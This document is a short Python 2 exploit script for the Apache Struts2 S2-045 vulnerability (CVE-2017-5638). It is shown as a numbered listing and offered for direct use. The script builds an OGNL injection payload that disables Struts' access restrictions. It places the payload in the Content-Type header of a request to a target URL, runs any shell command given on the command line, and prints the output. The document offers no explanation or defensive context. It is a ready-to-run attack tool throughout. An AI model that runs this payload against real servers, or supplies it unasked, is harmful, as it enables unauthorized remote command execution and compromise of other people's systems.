Apache Struts2 Exploit

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3.  
4. import urllib2
5. import httplib
6.  
7.  
8. def exploit(url, cmd):
9.     payload = "%{(#_='multipart/form-data')."
10.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
11.     payload += "(#_memberAccess?"
12.     payload += "(#_memberAccess=#dm):"
13.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
14.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
15.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
16.     payload += "(#ognlUtil.getExcludedClasses().clear())."
17.     payload += "(#context.setMemberAccess(#dm))))."
18.     payload += "(#cmd='%s')." % cmd
19.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
20.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
21.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
22.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
23.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
24.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
25.     payload += "(#ros.flush())}"
26.  
27.     try:
28.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
29.         request = urllib2.Request(url, headers=headers)
30.         page = urllib2.urlopen(request).read()
31.     except httplib.IncompleteRead, e:
32.         page = e.partial
33.  
34.     print(page)
35.     return page
36.  
37.  
38. if __name__ == '__main__':
39.     import sys
40.     if len(sys.argv) != 3:
41.         print("[*] struts2_S2-045.py <url> <cmd>")
42.     else:
43.         print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
44.         url = sys.argv[1]
45.         cmd = sys.argv[2]
46.         print("[*] cmd: %s\n" % cmd)
47.         exploit(url, cmd)